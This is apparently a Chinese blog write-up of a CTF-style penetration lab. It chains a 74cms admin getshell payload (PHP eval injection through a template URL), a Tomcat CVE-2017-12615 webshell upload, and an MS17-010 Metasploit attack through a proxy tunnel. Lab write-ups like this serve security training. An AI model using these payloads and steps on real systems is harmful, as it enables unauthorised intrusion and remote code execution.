cyber-lab2


lab2

精简思路

1
10主机cms先拿shell,然后20主机cve拿shell,发现其有内网,扫到一个30主机,有永恒之蓝,搭建代理后msf直接打就行

74cms后台getshell漏洞-flag1

直接登登不了,扫描一下端口

1
fscan.exe -h 192.168.10.10

image-20260112145311354

发现47cms,admin / admin123456 弱口令登录后台

image-20260112145358594

发现他的版本,直接搜,找到一个rce的payload打

[74cms v4.2.1 v4.2.129 后台getshell漏洞 - Wiki](https://l1ubai.github.io/vuldb/Web安全/74cms/74cms v4.2.1 - v4.2.129-后台getshell漏洞/)

image-20260112145535313

1
/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_POST['1']),'

保存在了/Application/Home/Conf/config.php,连蚁剑直接拿flag

image-20260112145924881

tomcat-cve-2017-12615-rce-flag2

发现此机子没内网,那上传fscan扫

image-20260112150131074

1
fscan.exe -h 192.168.10.10/24

image-20260112150805847

发现一个tomcat-cve-2017-12615-rce,搜一下直接打,参考下文

https://l1ubai.github.io/vuldb/Web%E5%AE%89%E5%85%A8/Tomcat/Tomcat%20%E5%90%8E%E5%8F%B0%E9%83%A8%E7%BD%B2war%E6%9C%A8%E9%A9%ACgetshell/

打直接要进入后台/manager/html,要用户密码,抓包发现用户密码在Authorization,直接爆破,发现爆破不出,有问题啊?

记一次暴力破解tomcat后台密码(附带python脚本)_tomcat后台登录字典-CSDN博客

image-20260112152214768

看别人wp,先用哥斯拉生成一个马,直接put

image-20260112161245146

哥斯拉直接连

image-20260112161228948

拿到flag2

image-20260112161439849

ms17-010-flag3

主机存在内网

image-20260112161743388

将fscan和windows_x64_agent.exe上传上去,先扫

1
fscan.exe  -h 192.168.20.20/24

image-20260112163111160

发现一个ms17-101,先建代理,kaili

1
./linux_x64_admin -l 172.16.233.2:8000 -s 123

靶机

1
win_agent.exe -c 172.16.233.2:8000 -s 123 --reconnect 8

(这里又卡了一下,又是虚拟机不能访问网址,这次我kali连vpn都没用,后面发现是路由问题,这里要注意)

1
sudo openvpn --config cyberstrikelab.com-lab2.ovpn --keepalive 10 60 &
1
2
3
4
sudo ip route del 0.0.0.0/1 via 172.16.233.1
sudo ip route del 128.0.0.0/1 via 172.16.233.1
# 2. 添加目标网络路由(最关键的一步!)
sudo ip route add 192.168.10.0/24 via 172.16.233.1 dev tun0

然后就是,这个哥斯拉也要放在虚拟机上执行,因为是kali开的vpn!,不然代理搭不成!

image-20260112173835691
1
2
3
4
5
proxychains4 msfconsole
use auxiliary/admin/smb/ms17_010_command
set RHOSTS 192.168.20.30
set COMMAND type C:\\flag.txt
run

image-20260112174055642

谢谢观看
使用 Hugo 构建
主题 StackJimmy 设计